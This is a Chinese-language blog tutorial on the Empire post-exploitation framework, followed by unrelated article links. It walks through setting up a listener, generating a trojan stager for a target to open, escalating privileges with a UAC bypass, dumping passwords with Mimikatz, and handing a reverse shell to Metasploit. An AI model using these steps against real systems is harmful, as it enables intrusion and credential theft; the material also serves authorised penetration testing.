一、前言

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中

二、empire使用详解

1.Empire 的安装

git clone https://github.com/EmpireProject/Empire.git

unzip Empire-master.zip

cd  Empire-master

cd setup/

./install.sh

(最后输入数据库密码)

2.设置监听

cd  Empire-master

./empire

(Empire) > help #主菜单帮助命令

(Empire) > listeners #查看本地监听代理地址,现在还没有会话代理,所以为空

进入后需要使用监听种类,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,这里我们使用 http

(Empire: listeners) > info #列出详细信息

(Empire: listeners) > set Name bk #设置Name为bk

(Empire: listeners) > execute #执行命令,这条命令将其name设置生效

至此,监听工作完成。我们开始配置生成后门。

3、生成木马

设置好监听后通过 back 命令返回上一级,然后使用 usestager 命令来指定生成木马的类型,通过空格加两下 tab 可查看所有生成文件的类型,这里我们使用 windows/hta,即 windows 平台下的 hta文件,同样,通过 info 查看此模块的详细信息。

(Empire: listeners/http) > back #返回上层模块

(Empire: listeners/http) > usestager #空格加两下tab

生成的文件类型大体有三类,multi 开头的是通用类,osx 开头即 mac 使用,windows 即 win 平台使用。

(Empire: listeners) > usestager windows/launcher_bat bk  # 选择木马种类

这里选择的是hta类型的脚本,当然也可以选择其他的。后面的bk就是刚刚设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

(Empire: stager/windows/launcher_bat) > info     #查看需要配置的参数信息

(Empire: stager/windows/hta > execute  #执行生成木马

将代码保存为hta文件,放到服务器上。

在目标机器上访问

运行命令后,我们回到我们的机器可以看到已经获取到了客户端的一个会话

(Empire: stager/windows/launcher_bat) > agents   #查看获取的代理会话

一个会话已经建立完成。

(Empire: agents) > rename DPFXWKY9 win10 #更改会话名字

(Empire: agents) > interact win10    #和该会话交互

我们通过 help 可查看一些命令和一些提供的内网渗透常用的工具

4、提权

如果想执行 windows 系统自带的命令,可以通过 shell 加命令的格式,例如查看当前 shell 的权限,我们输入 shell whoami /groups,返回了 medium 即非高权限,如下图:

非高权限的话,很多命令使用会有限制,例如 mimikatz,所以下面需要提升权限,这里我们使用 bypassuac,首先 empire 提供了很多使用模块,这里我们通过 usemodule 空格加两下 tab 可查看全部模块,有二百多个,如下图:

bypassuac 提权我们使用 usemodule privesc/bypassuac 这个模块,然后 info 查看其信息,如下图:

这里我们需要设置的参数还是 Listener,即监听的名称,这里是 bk,如下图:

设置后通过 execute 执行,成功后会返回一个新的 shell

随后我们通过 agents 查看已有的 shell,username 前带 * 号的就是高权限已经提权成功的 shell。

这时 mimikatz 已可以使用,输入 mimikatz 来获取目标账号密码,如下图:

通过 mimikatz 获取后,若在内网机器较多,为了查看方便,我们可以通过 creds 命令来直接列出其密码,如下图:

5、反弹shell给msf

empire 若需要结合 msf 使用,则可以将得到的 shell 反给 msf,使用模块 code_execution/invoke_shellcode,info 信息如下:

这里需要设置下Lhost 和Lport,Lhost 即 msf 所在机器的 ip,Lport 即 msf 监听反弹 shell 的端口,还有一个参数注意下,就是payload,默认值是 reverse_https,这个不用改,我们 msf 设置监听时 payload 需要和其一致,也需要设置成 reverse_https,设置后我们先不执行 execute 命令,先把 msf 监听设置好:

msf 的 payload 设置为 windows/meterpreter/reverse_https,Lhost 为本机所在的 ip,Lport 端口和刚才 empire 设置的一样,这里是 4444,然后 exploit 执行监听,这时返回 empire 执行 execute,停一会会看到 msf 已经收到了 shell,如下图:

返回 shell 后,我们可以执行 whoami /groups 看下权限,可以看到返回的是高权限的 shell,如下图:

后渗透工具Empire使用教程的更多相关文章

  1. 有趣的后渗透工具 Koadic

    koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...

  2. 带你了解后渗透工具Koadic

    前言: 在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧. 首先把项目克隆到本地: 项目地址 ...

  3. 后渗透神器Empire的简单使用

    1.安装 1.1.系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2.安装命令: 安装最后需要输入用户名.密码 wget https://raw.gi ...

  4. iOS macOS的后渗透利用工具:EggShell

    EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提 ...

  5. 渗透测试工具sqlmap基础教程

    转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过 ...

  6. Enumy:一款功能强大的Linux后渗透提权枚举工具

    Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enum ...

  7. 渗透攻防工具篇-后渗透阶段的Meterpreter

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...

  8. 后渗透提权辅助工具BeRoot详解

    0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/Alessa ...

  9. (转)前端构建工具gulp入门教程

    前端构建工具gulp入门教程 老婆婆 1.8k 2013年12月30日 发布 推荐 10 推荐 收藏 83 收藏,20k 浏览 本文假设你之前没有用过任何任务脚本(task runner)和命令行工具 ...

随机推荐

  1. 【ubuntu】开机一直“/dev/sda3:clean, XXX files, XXXX blocks”解决方法

    由于该电脑是实验室公用跑模型的机子,在解决过程中,发现是 cuda 导致一直进不了系统.原因是装了两个不同版本的cuda,一个9.2,另一个10.0,因为是公用的,目前尚不清楚,怎么同时装上两个的,也 ...

  2. python报错2

    缩进导致的报错 IndentationError: unindent does not match any outer indentation level NameError 命名错误 原因是: na ...

  3. 团队作业第五次——Alpha冲刺

    这个作业属于哪个课程 软件工程 这个作业要求在哪里 团队作业第五次--Alpha冲刺 这个作业的目标 Alpha冲刺 作业正文 正文 github链接 项目地址 其他参考文献 无 一.代码规范与计划 ...

  4. Rocket - debug - TLDebugModuleInner - ABSTRACTCS

    https://mp.weixin.qq.com/s/dF_0sE5ZakyY569wlppVHA 简单介绍TLDebugModuleInner中ABSTRACTCS寄存器的实现. 1. ABSTRA ...

  5. Rocket - tilelink - Fuzzer

    https://mp.weixin.qq.com/s/hAKpZHy0IU6_XEvctfkHOA   简单介绍Fuzzer的实现.   ​​   1. IDMapGenerator   功能类似于I ...

  6. 如何让a==1&&a==2&a==3成立

    /* * == 进行比较的时候,如果左右两边数据类型不一样,则先转换为相同的数据类型,然后在进行比较 *    1.{} == {} false 两个数据进行比较,比较的是堆内存的地址 *    2. ...

  7. Java实现 LeetCode 407 接雨水 II(二)

    407. 接雨水 II 给定一个 m x n 的矩阵,其中的值均为正整数,代表二维高度图每个单元的高度,请计算图中形状最多能接多少体积的雨水. 说明: m 和 n 都是小于110的整数.每一个单位的高 ...

  8. Java实现 洛谷 P1115 最大子段和

    import java.util.Scanner; public class Main { public static void main(String[] args) { Scanner scann ...

  9. java实现第五届蓝桥杯供水设施

    供水设施 X星球的居民点很多.Pear决定修建一个浩大的水利工程,以解决他管辖的N个居民点的供水问题.现在一共有N个水塔,同时也有N个居民点,居民点在北侧从1号到N号自西向东排成一排:水塔在南侧也从1 ...

  10. Tidyverse| XX_join :多个数据表(文件)之间的各种连接

    本文首发于公众号:“生信补给站” Tidyverse| XX_join :多个数据表(文件)之间的各种连接 前面分享了单个文件中的select列,filter行,列拆分等,实际中经常是多个数据表,综合 ...